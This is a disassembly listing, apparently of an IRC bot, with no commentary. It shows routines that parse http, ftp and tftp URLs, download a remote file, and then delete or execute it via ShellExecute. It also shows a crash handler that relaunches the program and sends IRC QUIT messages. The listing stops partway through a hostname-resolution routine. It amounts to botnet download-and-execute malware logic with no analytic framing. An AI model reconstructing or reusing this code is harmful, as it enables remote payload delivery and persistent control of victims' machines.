sub_402A2B proc near ; CODE XREF: sub_402A32+673�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A32 proc near ; DATA XREF: sub_403260+BC�o
var_814 = qword ptr -814h
var_804 = qword ptr -804h
var_7FC = dword ptr -7FCh
var_7F8 = qword ptr -7F8h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_6D5 = byte ptr -6D5h
var_6D4 = byte ptr -6D4h
var_6CC = dword ptr -6CCh
var_6C8 = dword ptr -6C8h
var_6C4 = dword ptr -6C4h
var_6C0 = dword ptr -6C0h
var_6BC = byte ptr -6BCh
var_6BB = byte ptr -6BBh
var_63C = dword ptr -63Ch
var_638 = byte ptr -638h
var_637 = byte ptr -637h
var_632 = byte ptr -632h
var_631 = byte ptr -631h
var_534 = byte ptr -534h
var_430 = byte ptr -430h
var_2A8 = byte ptr -2A8h
var_2A7 = byte ptr -2A7h
var_2A6 = byte ptr -2A6h
var_2A3 = byte ptr -2A3h
var_296 = byte ptr -296h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = byte ptr -284h
var_283 = byte ptr -283h
var_204 = byte ptr -204h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 804h
push edi
push 3AFh
push [ebp+arg_0]
lea eax, [ebp+var_63C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_7DC]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_288], 0
mov [ebp+var_28C], 1
and [ebp+var_6CC], 0
mov al, ds:byte_41DF00
mov [ebp+var_284], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_283]
rep stosd
stosw
stosb
mov al, ds:byte_41DF00
mov [ebp+var_6BC], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_6BB]
rep stosd
stosw
stosb
and [ebp+var_6C8], 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_4185CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 14h
push 7
push offset dword_4185C4
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_402B93
push 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_631]
push eax
call ds:dword_417060 ; CopyFileA
test eax, eax
jnz short loc_402B8E
call ds:dword_417064 ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_402B58
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41858C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_402B7B
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: sub_402A32+FF�j
lea eax, [ebp+var_631]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41855C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_402B7B: ; CODE XREF: sub_402A32+124�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402B8E: ; CODE XREF: sub_402A32+F4�j
jmp loc_403256
; ---------------------------------------------------------------------------
loc_402B93: ; CODE XREF: sub_402A32+D6�j
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402BB5
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402A32:loc_402CD8�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402BB5: ; CODE XREF: sub_402A32+174�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 3Ah
jnz loc_402CD8
mov [ebp+var_7E0], 1
jmp short loc_402BF2
; ---------------------------------------------------------------------------
loc_402BE5: ; CODE XREF: sub_402A32:loc_402CD3�j
mov eax, [ebp+var_7E0]
inc eax
mov [ebp+var_7E0], eax
loc_402BF2: ; CODE XREF: sub_402A32+1B1�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
test eax, eax
jz short loc_402C23
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 2Fh
jnz short loc_402C7A
loc_402C23: ; CODE XREF: sub_402A32+1D6�j
mov eax, [ebp+var_7E0]
and [ebp+eax+var_6D5], 0
lea eax, [ebp+var_6D4]
push eax
call sub_40422A
pop ecx
test eax, eax
jz short loc_402C75
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
add eax, [ebp+var_7E0]
push eax
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6C8], 1
loc_402C75: ; CODE XREF: sub_402A32+20E�j
jmp loc_403251
; ---------------------------------------------------------------------------
loc_402C7A: ; CODE XREF: sub_402A32+1EF�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 30h
jl short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 39h
jg short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
mov ecx, [ebp+var_7E0]
mov al, [ebp+eax+var_638]
mov [ebp+ecx+var_6D5], al
jmp short loc_402CD3
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: sub_402A32+25F�j
; sub_402A32+278�j
jmp loc_40324C
; ---------------------------------------------------------------------------
loc_402CD3: ; CODE XREF: sub_402A32+29A�j
jmp loc_402BE5
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: sub_402A32+1A1�j
jmp loc_402BA8
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402A32+18A�j
; sub_402A32:loc_40324C�j ...
push 7
push offset aHttp ; "http://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402D37
cmp [ebp+var_6C8], 0
jnz short loc_402D13
push offset a80 ; "80"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402D13: ; CODE XREF: sub_402A32+2CC�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 1
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_402A32+2C3�j
push 6
push offset aFtp ; "ftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402DB7
cmp [ebp+var_6C8], 0
jnz short loc_402D6D
push offset a21 ; "21"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402D6D: ; CODE XREF: sub_402A32+326�j
lea eax, [ebp+var_632]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 2
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_284]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_6BC]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402DB7: ; CODE XREF: sub_402A32+31D�j
push 7
push offset aTftp ; "tftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402E0E
cmp [ebp+var_6C8], 0
jnz short loc_402DED
push offset a69 ; "69"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402DED: ; CODE XREF: sub_402A32+3A6�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 3
jmp short loc_402E3D
; ---------------------------------------------------------------------------
loc_402E0E: ; CODE XREF: sub_402A32+39D�j
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_418500
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402E3D: ; CODE XREF: sub_402A32+300�j
; sub_402A32+380�j ...
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402E5F
; ---------------------------------------------------------------------------
loc_402E52: ; CODE XREF: sub_402A32:loc_402F11�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402E5F: ; CODE XREF: sub_402A32+41E�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402F16
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 40h
jnz loc_402F11
mov eax, [ebp+var_6C0]
and [ebp+eax+var_638], 0
push offset asc_4184FC ; ":"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_7E4], eax
cmp [ebp+var_7E4], 0
jz short loc_402ED8
mov eax, [ebp+var_7E4]
and byte ptr [eax], 0
push 80h
mov eax, [ebp+var_7E4]
inc eax
push eax
lea eax, [ebp+var_6BC]
push eax
call sub_407A56
add esp, 0Ch
loc_402ED8: ; CODE XREF: sub_402A32+47F�j
push 80h
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_284]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_637]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402F16
; ---------------------------------------------------------------------------
loc_402F11: ; CODE XREF: sub_402A32+44B�j
jmp loc_402E52
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: sub_402A32+434�j
; sub_402A32+4DD�j
push offset asc_4184F8 ; "/"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_288], eax
cmp [ebp+var_288], 0
jnz short loc_402F67
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_4184CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402F67: ; CODE XREF: sub_402A32+504�j
mov eax, [ebp+var_288]
inc eax
push eax
lea eax, [ebp+var_204]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_288]
and byte ptr [eax], 0
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp-6D8h], eax
and [ebp+var_6C4], 0
cmp [ebp+var_6CC], 1
jnz short loc_403009
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402698
add esp, 24h
mov [ebp+var_28C], eax
loc_403009: ; CODE XREF: sub_402A32+582�j
cmp [ebp+var_6CC], 2
jnz short loc_403065
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402A24
add esp, 24h
mov [ebp+var_28C], eax
loc_403065: ; CODE XREF: sub_402A32+5DE�j
cmp [ebp+var_6CC], 3
jnz short loc_4030B3
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
call sub_402A2B
add esp, 1Ch
mov [ebp+var_28C], eax
loc_4030B3: ; CODE XREF: sub_402A32+63A�j
; sub_402A32:loc_403256�j
cmp [ebp+var_28C], 1
jnz loc_403219
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4030D7
mov [ebp+var_7EC], offset dword_4184C0
jmp short loc_403104
; ---------------------------------------------------------------------------
loc_4030D7: ; CODE XREF: sub_402A32+697�j
movsx eax, [ebp+var_2A6]
test eax, eax
jz short loc_4030EE
mov [ebp+var_7F0], offset dword_4184B4
jmp short loc_4030F8
; ---------------------------------------------------------------------------
loc_4030EE: ; CODE XREF: sub_402A32+6AE�j
mov [ebp+var_7F0], offset byte_41DF00
loc_4030F8: ; CODE XREF: sub_402A32+6BA�j
mov eax, [ebp+var_7F0]
mov [ebp+var_7EC], eax
loc_403104: ; CODE XREF: sub_402A32+6A3�j
push [ebp+var_7EC]
mov eax, [ebp+var_6C4]
shr eax, 0Ah
mov dword ptr [ebp+var_7F8], eax
and dword ptr [ebp+var_7F8+4], 0
fild [ebp+var_7F8]
fstp [ebp+var_7FC]
call sub_416B64 ; clock
sub eax, [ebp-6D8h]
mov dword ptr [ebp+var_804], eax
and dword ptr [ebp+var_804+4], 0
fild [ebp+var_804]
fdiv ds:flt_417270
fdivr [ebp+var_7FC]
push ecx
push ecx
fstp [esp+814h+var_814]
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41846C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_2A7]
test eax, eax
jz short loc_403198
lea eax, [ebp+var_534]
push eax
call ds:dword_4170AC ; DeleteFileA
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_403198: ; CODE XREF: sub_402A32+755�j
movsx eax, [ebp+var_2A6]
test eax, eax
jnz short loc_4031AE
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_403217
loc_4031AE: ; CODE XREF: sub_402A32+76F�j
movsx eax, [ebp+var_2A3]
neg eax
sbb eax, eax
inc eax
push eax
push 0
push 0
lea eax, [ebp+var_534]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
mov [ebp+var_7E8], eax
cmp [ebp+var_7E8], 20h
jbe short loc_4031F4
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4031F2
call sub_407148
loc_4031F2: ; CODE XREF: sub_402A32+7B9�j
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: sub_402A32+7AE�j
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418444
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_403217: ; CODE XREF: sub_402A32+764�j
; sub_402A32+77A�j ...
jmp short loc_40323C
; ---------------------------------------------------------------------------
loc_403219: ; CODE XREF: sub_402A32+688�j
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418414
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_40323C: ; CODE XREF: sub_402A32:loc_403217�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_40325B
; ---------------------------------------------------------------------------
loc_40324C: ; CODE XREF: sub_402A32:loc_402CCE�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403251: ; CODE XREF: sub_402A32:loc_402C75�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403256: ; CODE XREF: sub_402A32:loc_402B8E�j
jmp loc_4030B3
; ---------------------------------------------------------------------------
loc_40325B: ; CODE XREF: sub_402A32+157�j
; sub_402A32+406�j ...
pop edi
leave
retn 4
sub_402A32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403260 proc near ; CODE XREF: sub_40A9CF+959�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 0
jnz short loc_403271
jmp locret_403329
; ---------------------------------------------------------------------------
loc_403271: ; CODE XREF: sub_403260+A�j
push 3AFh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_40328A
jmp locret_403329
; ---------------------------------------------------------------------------
loc_40328A: ; CODE XREF: sub_403260+23�j
push 8
push 7Ah
push 61h
push 4
lea eax, [ebp+var_10]
push eax
call sub_410501
add esp, 14h
and [ebp+eax+var_10], 0
push offset dword_418620
lea eax, [ebp+var_10]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jnz short loc_4032BF
lea eax, [ebp+var_10]
mov [ebp+arg_8], eax
loc_4032BF: ; CODE XREF: sub_403260+57�j
push 104h
push [ebp+arg_4]
mov eax, [ebp+var_14]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_14]
add eax, 108h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_14]
add eax, 20Ch
push eax
call sub_405F67
pop ecx
pop ecx
mov eax, [ebp+var_14]
add eax, 108h
push eax
mov eax, [ebp+var_14]
add eax, 4
push eax
push offset dword_4185FC
push 0
push [ebp+var_14]
push offset sub_402A32
call sub_4095A4
add esp, 18h
locret_403329: ; CODE XREF: sub_403260+C�j
; sub_403260+25�j
leave
retn
sub_403260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40332B proc near ; CODE XREF: sub_4093B6+A0�p
; sub_4094E6+9B�p ...
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 114h
push 1
push offset dword_41DF0C
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp ds:dword_41DF08, 0
jz loc_4034D9
mov [ebp+var_8], offset aException_othe ; "EXCEPTION_OTHER"
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_110], eax
cmp [ebp+var_110], 0C0000025h
ja short loc_4033A4
cmp [ebp+var_110], 0C0000025h
jz short loc_4033FA
cmp [ebp+var_110], 80000003h
jz short loc_4033DF
cmp [ebp+var_110], 0C0000005h
jz short loc_4033D6
cmp [ebp+var_110], 0C000001Dh
jz short loc_4033E8
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033A4: ; CODE XREF: sub_40332B+45�j
cmp [ebp+var_110], 0C000008Dh
jb short loc_403413
cmp [ebp+var_110], 0C0000093h
jbe short loc_40340C
cmp [ebp+var_110], 0C0000094h
jz short loc_4033F1
cmp [ebp+var_110], 0C00000FDh
jz short loc_403403
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033D6: ; CODE XREF: sub_40332B+69�j
mov [ebp+var_8], offset aException_acce ; "EXCEPTION_ACCESS_VIOLATION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_40332B+5D�j
mov [ebp+var_8], offset aException_brea ; "EXCEPTION_BREAKPOINT"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033E8: ; CODE XREF: sub_40332B+75�j
mov [ebp+var_8], offset aException_ille ; "EXCEPTION_ILLEGAL_INSTRUCTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033F1: ; CODE XREF: sub_40332B+9B�j
mov [ebp+var_8], offset aException_int_ ; "EXCEPTION_INT_DIVIDE_BY_ZERO"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033FA: ; CODE XREF: sub_40332B+51�j
mov [ebp+var_8], offset aException_nonc ; "EXCEPTION_NONCONTINUABLE_EXCEPTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_403403: ; CODE XREF: sub_40332B+A7�j
mov [ebp+var_8], offset aException_stac ; "EXCEPTION_STACK_OVERFLOW"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_40340C: ; CODE XREF: sub_40332B+8F�j
mov [ebp+var_8], offset aException_flt ; "EXCEPTION_FLT"
loc_403413: ; CODE XREF: sub_40332B+77�j
; sub_40332B+83�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_40342A
mov [ebp+var_114], offset aRestarting ; "Restarting"
jmp short loc_403434
; ---------------------------------------------------------------------------
loc_40342A: ; CODE XREF: sub_40332B+F1�j
mov [ebp+var_114], offset aContinuing ; "Continuing"
loc_403434: ; CODE XREF: sub_40332B+FD�j
push [ebp+var_114]
push [ebp+var_8]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41864C
push offset dword_41DB88
call sub_40D4AB
add esp, 48h
loc_4034D9: ; CODE XREF: sub_40332B+21�j
mov eax, [ebp+var_4]
inc eax
cmp eax, 64h
jz short loc_4034ED
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_403558
loc_4034ED: ; CODE XREF: sub_40332B+1B5�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
test eax, eax
jz short loc_403545
push 0
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
cmp eax, 20h
ja short loc_403538
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp short loc_403543
; ---------------------------------------------------------------------------
loc_403538: ; CODE XREF: sub_40332B+1FE�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403543: ; CODE XREF: sub_40332B+20B�j
jmp short loc_403550
; ---------------------------------------------------------------------------
loc_403545: ; CODE XREF: sub_40332B+1DF�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403550: ; CODE XREF: sub_40332B:loc_403543�j
push 0
call ds:dword_41705C ; ExitProcess
loc_403558: ; CODE XREF: sub_40332B+1C0�j
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 80000003h
jnz short loc_403583
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov eax, [eax+0B8h]
inc eax
mov ecx, [ebp+arg_0]
mov ecx, [ecx+4]
mov [ecx+0B8h], eax
or eax, 0FFFFFFFFh
jmp short locret_403586
; ---------------------------------------------------------------------------
loc_403583: ; CODE XREF: sub_40332B+238�j
push 1
pop eax
locret_403586: ; CODE XREF: sub_40332B+256�j
leave
retn
sub_40332B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403588 proc near ; DATA XREF: sub_403BD3:loc_403D85�o
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
cmp [ebp+arg_8], 0
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jz short loc_4035BB
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 2
jz short loc_4035BB
push 273Fh
call ds:dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035BB: ; CODE XREF: sub_403588+13�j
; sub_403588+1C�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 1
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 2
jz short loc_4035E2
push 273Ch
call ds:dword_417234 ; WSASetLastError
mov eax, 273Ch
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035E2: ; CODE XREF: sub_403588+A�j
; sub_403588+3A�j ...
cmp [ebp+arg_0], 0
jnz loc_4036D6
push 30h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_40360D
push 8
call ds:dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40360D: ; CODE XREF: sub_403588+73�j
push 30h
push 0
push [ebp+var_34]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_30]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_30], 2
cmp [ebp+arg_4], 0
jz short loc_40364C
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_2E], ax
loc_40364C: ; CODE XREF: sub_403588+AE�j
mov eax, [ebp+var_34]
mov dword ptr [eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_403667
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_38], eax
jmp short loc_40366E
; ---------------------------------------------------------------------------
loc_403667: ; CODE XREF: sub_403588+D2�j
mov [ebp+var_38], 1
loc_40366E: ; CODE XREF: sub_403588+DD�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
mov [eax+8], ecx
cmp [ebp+arg_8], 0
jz short loc_403688
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_3C], eax
jmp short loc_40368F
; ---------------------------------------------------------------------------
loc_403688: ; CODE XREF: sub_403588+F3�j
mov [ebp+var_3C], 6
loc_40368F: ; CODE XREF: sub_403588+FE�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_3C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_34]
mov dword ptr [eax+10h], 10h
mov eax, [ebp+var_34]
add eax, 20h
mov ecx, [ebp+var_34]
mov [ecx+18h], eax
and [ebp+var_2C], 0
push 10h
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_34]
add eax, 20h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
mov [eax], ecx
xor eax, eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036D6: ; CODE XREF: sub_403588+5E�j
push [ebp+arg_0]
call ds:dword_41723C ; gethostbyname
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4036F2
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036F2: ; CODE XREF: sub_403588+15E�j
and [ebp+var_20], 0
jmp short loc_4036FF
; ---------------------------------------------------------------------------
loc_4036F8: ; CODE XREF: sub_403588+18C�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4036FF: ; CODE XREF: sub_403588+16E�j
cmp [ebp+var_14], 0
jz short loc_403716
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_20]
cmp dword ptr [eax+ecx*4], 0
jz short loc_403716
jmp short loc_4036F8
; ---------------------------------------------------------------------------
loc_403716: ; CODE XREF: sub_403588+17B�j
; sub_403588+18A�j
cmp [ebp+var_20], 0
jnz short loc_403726
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_403726: ; CODE XREF: sub_403588+192�j
